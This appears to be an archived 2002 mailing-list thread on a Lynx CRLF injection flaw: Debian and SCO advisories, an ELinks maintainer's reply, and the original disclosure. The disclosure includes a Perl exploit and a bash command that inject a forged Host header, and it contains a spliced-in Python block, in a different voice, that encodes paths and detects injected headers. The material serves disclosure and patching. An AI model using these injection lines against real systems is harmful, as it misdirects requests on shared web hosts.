[SECURITY] [DSA-210-1] lynx CRLF injection

2002-12-12 Thread Wichert Akkerman
--------------------------------------------------------------------------
Debian Security Advisory DSA-210-1                       [EMAIL PROTECTED]
http://www.debian.org/security/                          Wichert Akkerman
December 13, 2002
--------------------------------------------------------------------------


Package        : lynx, lynx-ssl
Problem type   : CRLF injection
Debian-specific: no

lynx (a text-only web browser) did not properly check for illegal
characters in all places, including processing of command line options,
which could be used to insert extra HTTP headers in a request.

For Debian GNU/Linux 2.2/potato this has been fixed in version 2.8.3-1.1
of the lynx package and version 2.8.3.1-1.1 of the lynx-ssl package.

For Debian GNU/Linux 3.0/woody this has been fixed in version 2.8.4.1b-3.2
of the lynx package and version 1:2.8.4.1b-3.1 of the lynx-ssl package.


Obtaining updates:

  By hand:
    wget URL
        will fetch the file for you.
    dpkg -i FILENAME.deb
        will install the fetched file.

  With apt:
    deb http://security.debian.org/ stable/updates main
        added to /etc/apt/sources.list will provide security updates

Additional information can be found on the Debian security webpages
at http://www.debian.org/security/



Debian GNU/Linux 2.2 alias potato
---------------------------------

  Potato was released for alpha, arm, i386, m68k, powerpc and sparc.


  Source archives:




Debian GNU/Linux 3.0 alias woody
--------------------------------

  Woody was released for alpha, arm, hppa, i386, ia64, m68k, mips, mipsel,
  powerpc, s390 and sparc.

  Source archives:



Security Update: [CSSA-2002-049.0] Linux: lynx CRLF injection vulnerability

2002-11-22 Thread security


__

SCO Security Advisory

Subject:          Linux: lynx CRLF injection vulnerability
Advisory number:  CSSA-2002-049.0
Issue date:       2002 November 18
Cross reference:
__


1. Problem Description

If lynx is given a url with some special characters on
the command line, it will include faked headers in the HTTP
query. This feature can be used to force scripts (that use Lynx
for downloading files) to access the wrong site on a web server
with multiple virtual hosts.


2. Vulnerable Supported Versions

System                       Package
---------------------------  --------------------------------
OpenLinux 3.1.1 Server       prior to lynx-2.8.4-1.i386.rpm
OpenLinux 3.1.1 Workstation  prior to lynx-2.8.4-1.i386.rpm
OpenLinux 3.1 Server         prior to lynx-2.8.4-1.i386.rpm
OpenLinux 3.1 Workstation    prior to lynx-2.8.4-1.i386.rpm


3. Solution

The proper solution is to install the latest packages. Many
customers find it easier to use the Caldera System Updater, called
cupdate (or kcupdate under the KDE environment), to update these
packages rather than downloading and installing them by hand.


4. OpenLinux 3.1.1 Server

4.1 Package Location

ftp://ftp.sco.com/pub/updates/OpenLinux/3.1.1/Server/CSSA-2002-049.0/RPMS

4.2 Packages

86aa0c385c7b4789aa33fe57dc209490  lynx-2.8.4-1.i386.rpm

4.3 Installation

rpm -Fvh lynx-2.8.4-1.i386.rpm

4.4 Source Package Location

ftp://ftp.sco.com/pub/updates/OpenLinux/3.1.1/Server/CSSA-2002-049.0/SRPMS

4.5 Source Packages

2b48e8130471668d9562fc10a5969d02  lynx-2.8.4-1.src.rpm


5. OpenLinux 3.1.1 Workstation

5.1 Package Location

ftp://ftp.sco.com/pub/updates/OpenLinux/3.1.1/Workstation/CSSA-2002-049.0/RPMS

5.2 Packages

bd467354192cc42c87abb4be5650749f  lynx-2.8.4-1.i386.rpm

5.3 Installation

rpm -Fvh lynx-2.8.4-1.i386.rpm

5.4 Source Package Location

ftp://ftp.sco.com/pub/updates/OpenLinux/3.1.1/Workstation/CSSA-2002-049.0/SRPMS

5.5 Source Packages

cf32748b277276e5f43a6f4111bb1ff2  lynx-2.8.4-1.src.rpm


6. OpenLinux 3.1 Server

6.1 Package Location

ftp://ftp.sco.com/pub/updates/OpenLinux/3.1/Server/CSSA-2002-049.0/RPMS

6.2 Packages

02bb0b77cf7f6014c6ad5a386e5bc763  lynx-2.8.4-1.i386.rpm

6.3 Installation

rpm -Fvh lynx-2.8.4-1.i386.rpm

6.4 Source Package Location

ftp://ftp.sco.com/pub/updates/OpenLinux/3.1/Server/CSSA-2002-049.0/SRPMS

6.5 Source Packages

61828e229e2794c46376c95354c8859c  lynx-2.8.4-1.src.rpm


7. OpenLinux 3.1 Workstation

7.1 Package Location

ftp://ftp.sco.com/pub/updates/OpenLinux/3.1/Workstation/CSSA-2002-049.0/RPMS

7.2 Packages

d0b3580c93c3790d88eb0c4d18a75e58  lynx-2.8.4-1.i386.rpm

7.3 Installation

rpm -Fvh lynx-2.8.4-1.i386.rpm

7.4 Source Package Location

ftp://ftp.sco.com/pub/updates/OpenLinux/3.1/Workstation/CSSA-2002-049.0/SRPMS

7.5 Source Packages

2c321eabba1a1d8172893de42f58af59  lynx-2.8.4-1.src.rpm


8. References

Specific references for this advisory:
none

SCO security resources:
http://www.sco.com/support/security/index.html

This security fix closes SCO incidents sr868660, fz525986,
erg712118.


9. Disclaimer

SCO is not responsible for the misuse of any of the information
we provide on this website and/or through our security
advisories. Our advisories are a service to our customers intended
to promote secure installation and use of SCO products.


10. Acknowledgements

SCO would like to thank Ulf Harnhammar for the discovery and
analysis of this vulnerability.

__




Re: Lynx CRLF Injection, part two

2002-08-29 Thread Petr Baudis

Hello,

Dear diary, on Fri, Aug 23, 2002 at 11:09:21AM CEST, I got a letter,
where Alberto Devesa [EMAIL PROTECTED] told me, that...
> The same bug seems to affect the links browser. I have tested it with the
> 0.96 version. Links is another console browser with extended capabilities not
> supported by lynx like frames, colors and menus.

  Yes, the same bug exists in Links and ELinks. Ulf contacted us both
maintainers; however, I wasn't able to react fast enough due to the floods in
the Czech Republic. Yesterday, I finally fixed the bug in ELinks-0.4pre and
released ELinks-0.4pre15 (we now actually encode even tab, CR and LF when
sending the URL to the server). All ELinks users are recommended to upgrade;
the new ELinks homepage is at http://elinks.or.cz/.

  Note that there's no fix for ELinks-0.3.2, as I don't consider this a
critical bug and ELinks-0.4.0 is expected to replace ELinks-0.3.2 in the very
near future.

-- 

Petr "Pasky" Baudis

* ELinks maintainer    * IPv6 guy (XS26 co-coordinator)
* IRCnet operator      * FreeCiv AI occasional hacker
.
<Beeth> Girls are like internet domain names, the ones I like are already taken.
<honx> Well, you can still get one from a strange country :-P
.
Public PGP key & geekcode & homepage: http://pasky.ji.cz/~pasky/



Lynx CRLF Injection

2002-08-19 Thread Ulf Harnhammar

Lynx CRLF Injection


PROGRAM: Lynx
VENDOR: Lynx-Dev List [EMAIL PROTECTED]
HOMEPAGE: http://lynx.browser.org/
VULNERABLE VERSIONS: 2.8.4rel.1, 2.8.5dev.8, 2.8.3rel.1, 2.8.2rel.1,
 possibly others
IMMUNE VERSIONS: 2.8.4rel.1 with all patches applied
PATCH: ftp://lynx.isc.org/lynx2.8.4/patches/lynx2.8.4rel.1c.patch
SEVERITY: medium


DESCRIPTION:

Lynx is a fully-featured World Wide Web (WWW) client for users
running cursor-addressable, character-cell display devices such
as vt100 terminals, vt100 emulators running on Windows 95/NT or
Macintoshes, or any other character-cell display.  It will display
Hypertext Markup Language (HTML) documents containing links to files
on the local system, as well as files on remote systems running
http, gopher, ftp, wais, nntp, finger, or cso/ph/qi servers, and
services accessible via logins to telnet, tn3270 or rlogin accounts.
Current versions of Lynx run on Unix, VMS, Windows95/NT, 386DOS
and OS/2 EMX.

(direct quote from the program's README file)

Lynx is published under the terms of the GNU General Public License.
It is a very common program (I personally have used it since 1995),
but this hole will only affect some of its users.


SUMMARY:

If you give Lynx a URL with some special characters on the command
line, it will include faked headers in the HTTP query. This way,
you can make scripts that use Lynx for downloading files access
the wrong site on a web server with multiple virtual hosts.


TECHNICAL DETAILS:

When a URL is given on the command line or in the WWW_HOME
environment variable, Lynx doesn't remove or encode dangerous
characters such as space, tab, CR and LF before constructing HTTP
queries. This means that an attacker can construct a URL that will
send arbitrary faked HTTP headers, by adding space + HTTP/1.0 +
CRLF + some headers + CRLF + CRLF after the normal URL. Lynx's own
HTTP headers are sent after the faked headers, but the web server
ignores them, as our CRLF + CRLF pair above indicates the end of
the headers.

This may cause some security problems. One scenario is when a
program starts Lynx, and the host part of the URL is supplied
by the program and the path by its user (something like lynx
http://www.site3.st/$path, where the value of $path is defined by
the user). An attacker can make such a program access some other web
site than www.site3.st, if it's a virtual host on the same machine
as www.site3.st, by adding a Host: header as described above.

Relative links don't work in web pages that are fetched this way. If
there is a relative link like <a href="sunnanvind.html">Sunnan</a>
and the user follows it, Lynx gets confused.

To get more information about this type of hole,
read my paper CRLF Injection, which is available at
http://cert.uni-stuttgart.de/archive/bugtraq/2002/05/msg00079.html
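An added example (mine, not code from the advisory or from Lynx) of what a script that hands a user-supplied path to a downloader should do with the characters named above: percent-encode space, tab, CR and LF before the path enters the URL, as the ELinks fix does, and check that the request it built carries exactly the Host header it intended. The function names, the sample path and the host names are constructed for this illustration.

```python
from urllib.parse import quote


def encode_path(path: str) -> str:
    """Percent-encode a user-controlled path before it enters a URL.
    quote() keeps '/' and the unreserved characters and encodes the rest,
    so space, tab, CR and LF (the characters the advisory names) become
    %20, %09, %0D and %0A and can no longer terminate the request line."""
    return quote(path, safe="/")


def naive_request(host: str, path: str) -> str:
    """Request a downloader sends if it splices the path in unencoded
    (the behaviour the advisory describes for Lynx 2.8.4rel.1)."""
    return f"GET {path} HTTP/1.0\r\nHost: {host}\r\n\r\n"


def safe_request(host: str, path: str) -> str:
    """The same request with the path encoded first."""
    return naive_request(host, encode_path(path))


def header_lines(request: str) -> list[str]:
    """Header lines of a request: everything up to the first blank line,
    minus the request line itself. A server stops reading headers there,
    which is why a CRLF CRLF inside the URL hides whatever follows it."""
    head = request.split("\r\n\r\n", 1)[0]
    return head.split("\r\n")[1:]


def injected_headers(request: str, expected_host: str) -> list[str]:
    """Header lines other than the single 'Host: <expected_host>' the
    script meant to send. A non-empty result means the path smuggled
    headers into the request."""
    return [line for line in header_lines(request)
            if line != f"Host: {expected_host}"]


# Constructed sample input shaped like the advisory's pattern
# (space + HTTP/1.0 + CRLF + a Host header + CRLF CRLF); hosts are fictitious.
CRAFTED_PATH = "/ HTTP/1.0\r\nHost: www.site2.st\r\n\r\n"
TARGET_HOST = "www.site1.st"

if __name__ == "__main__":
    naive = naive_request(TARGET_HOST, CRAFTED_PATH)
    safe = safe_request(TARGET_HOST, CRAFTED_PATH)
    print("unencoded path, extra headers:", injected_headers(naive, TARGET_HOST))
    print("encoded path, extra headers:  ", injected_headers(safe, TARGET_HOST))
    print("encoded path:", encode_path(CRAFTED_PATH))
```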


PERL EXPLOIT:

#!/usr/bin/perl --
# Ulf Harnhammar 2002
# example: ./exploit www.site1.st www.site2.st
# will show www.site2.st

die "$0 hostone hosttwo\n" if @ARGV != 2;

# exec() with a single string goes through the shell; the outer double
# quotes keep the whole URL, embedded newlines included, as one argument.
exec('lynx "'.
     "http://$ARGV[0]/ HTTP/1.0\012".
     "Host: $ARGV[1]\012\012".
     '"');


BASH COMMAND LINE EXPLOIT:

(This exploit assumes that www.site1.st and www.site2.st are virtual
hosts on the same machine. Lynx will show www.site2.st.)

[ulf@metaur ulf]$ lynx "http://www.site1.st/ HTTP/1.0
Host: www.site2.st

"


COMMUNICATION WITH VENDOR:

The vendor was contacted on the 13th of August. Their patch was
released and announced on the Lynx-Dev list on the 18th.


// Ulf Harnhammar
[EMAIL PROTECTED]